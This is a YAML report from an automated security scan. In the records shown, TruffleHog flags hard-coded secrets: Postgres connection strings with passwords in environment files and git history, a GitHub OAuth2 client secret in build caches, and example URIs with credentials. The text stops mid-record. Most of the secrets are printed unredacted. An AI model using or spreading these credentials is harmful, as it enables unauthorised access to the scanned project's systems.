meta: output_version: 1.0.0 jmo_version: 1.0.5 schema_version: 1.2.0 timestamp: '2026-05-21T06:36:10.198780Z' scan_id: 202284b8-0052-4181-970d-ee2285144fcf profile: '' tools: - checkov - hadolint - semgrep - syft - trivy - trufflehog - zap target_count: 1 finding_count: 712 platform: Linux findings: - schemaVersion: 1.2.0 id: d818f4846421d653 ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/.env.docker.production.example startLine: 0 message: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/.env.docker.production.example line: 9 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' VerificationFromCache: false Raw: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 RawV2: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: &id001 - control: '3.11' title: Encrypt Sensitive Data at Rest implementationGroup: IG1 - control: '5.4' title: Restrict Administrator Privileges to Dedicated Administrator Accounts implementationGroup: IG1 nistCsf2_0: - &id002 function: PROTECT category: PR.AC subcategory: PR.AC-1 description: Identities and credentials are issued, managed, verified, revoked, and audited - &id003 function: PROTECT category: PR.DS subcategory: PR.DS-1 description: Data-at-rest is protected pciDss4_0: - &id004 requirement: 8.3.2 description: Strong cryptography for authentication credentials priority: CRITICAL - &id005 requirement: 8.2.1 description: Verify user identity before credential modification priority: HIGH mitreAttack: - &id006 tactic: Credential Access technique: T1552 techniqueName: Unsecured Credentials subtechnique: T1552.001 subtechniqueName: Credentials in Files - &id007 tactic: Initial Access technique: T1078 techniqueName: Valid Accounts subtechnique: '' subtechniqueName: '' priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 35ed8d11af314afa ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/.env.local startLine: 0 message: postgresql://postgres:password@postgres:5432 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/.env.local line: 1 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' VerificationFromCache: false Raw: postgresql://postgres:password@postgres:5432 RawV2: postgresql://postgres:password@postgres:5432 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 48b308b8dd5acde8 ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/.env.docker.dev startLine: 0 message: postgresql://postgres:password@postgres:5432 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/.env.docker.dev line: 1 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' VerificationFromCache: false Raw: postgresql://postgres:password@postgres:5432 RawV2: postgresql://postgres:password@postgres:5432 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1c16bda367ac0bd8 ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/.env.docker.test startLine: 0 message: postgresql://postgres:password@postgres:5432 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/.env.docker.test line: 1 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' VerificationFromCache: false Raw: postgresql://postgres:password@postgres:5432 RawV2: postgresql://postgres:password@postgres:5432 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: deeba988a9ab6141 ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c startLine: 0 message: postgresql://postgres:password@postgres:5432 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c line: 1 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' VerificationFromCache: true Raw: postgresql://postgres:password@postgres:5432 RawV2: postgresql://postgres:password@postgres:5432 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 381c867d67edf2e8 ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208 startLine: 0 message: postgresql://postgres:change-me@postgres:5432 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208 line: 7 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' VerificationFromCache: false Raw: postgresql://postgres:change-me@postgres:5432 RawV2: postgresql://postgres:change-me@postgres:5432 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: edccc43a23cfabf6 ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14 startLine: 0 message: postgresql://postgres:password@postgres:5432 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14 line: 1 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' VerificationFromCache: true Raw: postgresql://postgres:password@postgres:5432 RawV2: postgresql://postgres:password@postgres:5432 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: aae1f539799fb2de ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06 startLine: 0 message: postgresql://postgres:password@postgres:5432 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06 line: 1 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' VerificationFromCache: true Raw: postgresql://postgres:password@postgres:5432 RawV2: postgresql://postgres:password@postgres:5432 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 786bfda631317a71 ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924 startLine: 0 message: postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924 line: 7 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' VerificationFromCache: false Raw: postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432 RawV2: postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 595d2f235b05e737 ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc startLine: 0 message: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc line: 9 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' VerificationFromCache: true Raw: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 RawV2: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3ed146267f450c31 ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c startLine: 0 message: postgresql://postgres:change-me@postgres:5432 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c line: 7 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' VerificationFromCache: true Raw: postgresql://postgres:change-me@postgres:5432 RawV2: postgresql://postgres:change-me@postgres:5432 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2998e9823a9a5e07 ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46 startLine: 0 message: postgresql://postgres:change-me@postgres:5432 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46 line: 10 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' VerificationFromCache: true Raw: postgresql://postgres:change-me@postgres:5432 RawV2: postgresql://postgres:change-me@postgres:5432 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d6855b7ba77520b3 ruleId: GitHubOauth2 severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz startLine: 0 message: 52813b1d8ad9af510d85 title: GitHubOauth2 secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz line: 10674 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 924 DetectorName: GitHubOauth2 DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources. DecoderName: BASE64 Verified: false VerificationFromCache: false Raw: 52813b1d8ad9af510d85 RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/github/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 437a1c93140bc172 ruleId: GitHubOauth2 severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz startLine: 0 message: 52813b1d8ad9af510d85 title: GitHubOauth2 secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz line: 9955 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 924 DetectorName: GitHubOauth2 DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources. DecoderName: PLAIN Verified: false VerificationFromCache: false Raw: 52813b1d8ad9af510d85 RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/github/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7029ffbb2c18937d ruleId: GitHubOauth2 severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz startLine: 0 message: 52813b1d8ad9af510d85 title: GitHubOauth2 secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz line: 6254 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 924 DetectorName: GitHubOauth2 DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources. DecoderName: BASE64 Verified: false VerificationFromCache: true Raw: 52813b1d8ad9af510d85 RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/github/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 992176a363e3d8a9 ruleId: GitHubOauth2 severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/apps/dashboard/.next/cache/webpack/server-production/0.pack startLine: 0 message: 52813b1d8ad9af510d85 title: GitHubOauth2 secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/apps/dashboard/.next/cache/webpack/server-production/0.pack line: 245909 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 924 DetectorName: GitHubOauth2 DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources. DecoderName: PLAIN Verified: false VerificationFromCache: true Raw: 52813b1d8ad9af510d85 RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/github/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c1bd932c91cd4cda ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/@types/node/http.d.ts startLine: 0 message: http://abc:xyz@example.com title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/@types/node/http.d.ts line: 1790 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: PLAIN Verified: false VerificationFromCache: false Raw: http://abc:xyz@example.com RawV2: http://abc:xyz@example.com Redacted: http://abc:********@example.com ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 65c35953dedc7b57 ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/@types/node/https.d.ts startLine: 0 message: https://abc:xyz@example.com title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/@types/node/https.d.ts line: 428 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: PLAIN Verified: false VerificationFromCache: false Raw: https://abc:xyz@example.com RawV2: https://abc:xyz@example.com Redacted: https://abc:********@example.com ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f081eac965f118df ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/@types/node/url.d.ts startLine: 0 message: https://123:xyz@example.com title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/@types/node/url.d.ts line: 722 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: PLAIN Verified: false VerificationFromCache: false Raw: https://123:xyz@example.com RawV2: https://123:xyz@example.com Redacted: https://123:********@example.com ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a18230c14354e278 ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/@types/node/url.d.ts startLine: 0 message: https://abc:xyz@example.com title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/@types/node/url.d.ts line: 716 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: PLAIN Verified: false VerificationFromCache: false Raw: https://abc:xyz@example.com RawV2: https://abc:xyz@example.com Redacted: https://abc:********@example.com ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f03f52d67f2ae961 ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/@types/node/url.d.ts startLine: 0 message: https://abc:123@example.com title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/@types/node/url.d.ts line: 557 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: PLAIN Verified: false VerificationFromCache: false Raw: https://abc:123@example.com RawV2: https://abc:123@example.com Redacted: https://abc:********@example.com ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 